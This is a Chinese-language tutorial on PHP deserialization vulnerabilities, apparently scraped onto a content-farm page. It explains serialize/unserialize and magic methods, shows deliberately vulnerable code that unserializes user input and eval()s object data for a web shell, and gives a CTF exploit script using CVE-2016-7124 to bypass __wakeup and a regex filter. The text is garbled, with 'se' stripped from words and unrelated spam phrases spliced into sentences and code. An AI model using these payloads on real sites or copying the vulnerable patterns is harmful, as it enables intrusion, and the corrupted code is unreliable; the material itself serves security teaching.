1 前言
最近也是在复习之前学过的内容,感觉对php反序列化的理解更加深了,所以在此总结一下
2 ria夏洛特烦恼影评lize()函数
“所有php里面的值都可以使用函数rialize()来返回一个包含字节流的字符串来表示。序列化一个对象将会保存对象的所有变量,但是不会保存对象的方法,只会保存类的名字。”
一开始看这个概念可能有些懵,但之后也是慢慢理解了
在程序执行结束时,内存数据便会立即销毁,变量所储存的数据便是内存数据,而文件、数据库是“持久数据”,因此php序列化就是将内存的变量数据“保存”到文件中的持久数据的过程。
$s = rialize($变量); //该函数将变量数据进行序列化转换为字符串 file_put_contents(‘./目标文本文件', $s); //将$s保存到指定文件
下面通过一个具体的例子来了解一下序列化:
<?phpclass ur{ public $age = 0; public $name = ''; public function printdata() { echo 'ur '.$this->name.'is'.$this->age.'years old. <br />'; }}//创建一个对象$ur = new ur();// 设置数据$ur->age = 20;$ur->name = 'daye';//输出数据$ur->printdata();//输出序列化之后的数据echo rialize($ur);?>
这个是结果:
可以看到序列化一个对象后将会保存对象的所有变量,并且发现序列化后的结果都有一个字符,这些字符都是以下字母的缩写。
a - array b - booleand - double i - integero - common object r - references - string c - custom objecto - class n - nullr - pointer reference u - unicode string
了解了缩写的类型字母,便可以得到php序列化格式
o:4:"ur":2:{s:3:"age";i:20;s:4:"name";s:4:"daye";}对象类型:长度:"类名":类中变量的个数:{类型:长度:"值";类型:长度:"值";......}
通过以上例子,便可以理解了概念中的通过rialize()函数返回一个包含字节流的字符串这一段话。
3 unrialize()函数
unrialize()
对单一的已序列化的变量进行操作,将其转换回 php 的值。在解序列化一个对象前,这个对象的类必须在解序列化之前定义。
简单来理解起来就算将序列化过存储到文件中的数据,恢复到程序代码的变量表示形式的过程,恢复到变量序列化之前的结果。
$s = file_get_contents(‘./目标文本文件'); //取得文本文件的内容(之前序列化过的字符串) $变量 = unrialize($s); //将该文本内容,反序列化到指定的变量中
通过一个例子来了解反序列化:
<?phpclass ur{ public $age = 0; public $name = ''; public function printdata() { echo 'ur '.$this->name.' is '.$this->age.' years old. <br />'; }}//重建对象$ur = unrialize('o:4:"ur":2:{s:3:"age";i:20;s:4:"name";s:4:"daye";}');$ur->printdata();?>
这个是结果:
注意:在解序列化一个对象前,这个对象的类必须在解序列化之前定义。否则会报错
4 php反序列化漏洞
在学习漏洞前,先来了解一下php魔法函数,对接下来的学习会很有帮助
php 将所有以 __(两个下划线)开头的类方法保留为魔术方法
__construct 当一个对象创建时被调用,__destruct 当一个对象销毁时被调用,__tostring 当一个对象被当作一个字符串被调用。__wakeup() 使用unrialize时触发__sleep() 使用rialize时触发__destruct() 对象被销毁时触发__call() 在对象上下文中调用不可访问的方法时触发__callstatic() 在静态上下文中调用不可访问的方法时触发__get() 用于从不可访问的属性读取数据__t() 用于将数据写入不可访问的属性__ist() 在不可访问的属性上调用ist()或empty()触发__unt() 在不可访问的属性上使用unt()时触发__tostring() 把类当作字符串使用时触发,返回值需要为字符串__invoke() 当脚本尝试将对象调用为函数时触发
这里只列出了一部分的魔法函数,具体可见
下面通过一个例子来了解一下魔法函数被自动调用的过程
<?phpclass test{ public $varr1="abc"; public $varr2="123"; public function echop(){ echo $this->varr1."<br>"; } public function __construct(){ echo "__construct<br>"; } public function __destruct(){ echo "__destruct<br>"; } public function __tostring(){ return "__tostring<br>"; } public function __sleep(){ echo "__sleep<br>"; return array('varr1','varr2'); } public function __wakeup(){ echo "__wakeup<br>"; }}$obj = new test(); //实例化对象,调用__construct()方法,输出__construct$obj->echop(); //调用echop()方法,输出"abc"echo $obj; //obj对象被当做字符串输出,调用__tostring()方法,输出__tostring$s =rialize($obj); //obj对象被序列化,调用__sleep()方法,输出__sleepecho unrialize($s); //$s首先会被反序列化,会调用__wake()方法,被反序列化出来的对象又被当做字符串,就会调用_tostring()方法。// 脚本结束又会调用__destruct()方法,输出__destruc澳门旅游景点t?>
这个是结果:
通过这个例子就可以清晰的看到魔法函数在符合相应的条件时便会被调用。
5 对象注入
当用户的请求在传给反序列化函数unrialize()之前没有被正确的过滤时就会产生漏洞。因为php允许对象序列化,攻击者就可以提交特定的序列化的字符串给一个具有该漏洞的unrialize函数,最终导致一个在该应用范围内的任意php对象注入。
对象漏洞出现得满足两个前提:
一、unrialize的参数可控。
二、 代码里有定义一个含严重青春痘怎么办有魔术方法的类,并且该方法里出现一些使用类成员变量作为参数的存在安全问题的函数。
下面来举个例子:
<?phpclass a{ var $test = "demo"; function __destruct(){ echo $this->test; }}$a = $_get['test'];$a_unr = unrialize($a);?>
比如这个列子,直接是用户生成的内容传递给unrialize()函数,那就可以构造这样的语句
?test=o:1:"a":1:{s:4:"test";s:5:"lemon";}
在脚本运行结束后便会调用_destruct函数,同时会覆盖test变量输出lemon。
发现这个漏洞,便可以利用这个漏洞点控制输入变量,拼接成一个序列化对象。
再看一个例子:
<?phpclass a{ var $test = "demo"; function __destruct(){ @eval($this->test);//_destruct()函数中调用eval执行序列化对象中的语句 }}$test = $_post['test'];$len = strlen($test)+1;$pp = "o:1:\"a\":1:{s:4:\"test\";s:".$len.":\"".$test.";\";}"; // 构造序列化对象$test_unr = unrialize($pp); // 反序列化同时触发_destruct函数?>
其实仔细观察就会发现,其实我们手动构造序列化对象就是为了unrialize()函数能够触发__destruc()函数,然后执行在__destruc()函数里恶意的语句。
所以我们利用这个漏洞点便可以获取web shell了
6 绕过魔法函数的反序列化
wakeup()魔法函数绕过
php5<5.6.25php7<7.0.10
php反序列化漏洞cve-2016-7124
#a#重点:当反序列化字符串中,表示属性个数的值大于真实属性个数时,会绕过 __wakeup 函数的执行
百度杯——hash
其实仔细分析代码,只要我们能绕过两点即可得到f15g_1s_here.php的内容
(1)绕过正则表达式对变量的检查
(2)绕过_wakeup()魔法函数,因为如果我们反序列化的不是gu3ss_m3_h2h2.php,这个魔法函数在反序列化时会触发并强制转成gu3ss_m3_h2h2.php
那么问题就来了,如果绕过正则表达式
(1)/[oc]:\d+:/i,例如:o:4:这样就会被匹配到,而绕过也很简单,只需加上一个+,这个正则表达式即匹配不到0:+4:
(2)绕过_wakeup()魔法函数,上面提到了当反序列化字符串中,表示属性个数的值大于真实属性个数时,会绕过 _wakeup 函数的执行
编写php序列化脚本
<?phpclass demo { private $file = 'gu3ss_m3_h2h2.php'; public function __construct($file) {有机化学网 $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); } function __wakeup() { if ($this->file != 'gu3ss_m3_h2h2.php') { //the cret is in the f15g_1s_here.php $this->file = 'gu3ss_m3_h2h2.php'; } }}#陆游筑书巢先创建一个对象,自动调用__construct魔法函数$obj = new demo('f15g_1s_here.php');#进行序列化$a = rialize($obj);#使用str_replace() 函数进行替换,来绕过正则表达式的检查$a = str_replace('o:4:','o:+4:',$a);#使用str_replace() 函数进行替换,来绕过__wakeup()魔法函数$a = str_replace(':1:',':2:',$a);#再进行ba64编码echo ba64_encode($a);?>
以上就是详解php反序列化的详细内容,更多关于php反序列化的资料请关注www.887551.com其它相关文章!
本文发布于:2023-04-08 18:29:39,感谢您对本站的认可!
本文链接:https://www.wtabcd.cn/fanwen/zuowen/8e1497c7ee12c49ba2668efdd0539a55.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文word下载地址:详解php反序列化.doc
本文 PDF 下载地址:详解php反序列化.pdf
留言与评论(共有 0 条评论) |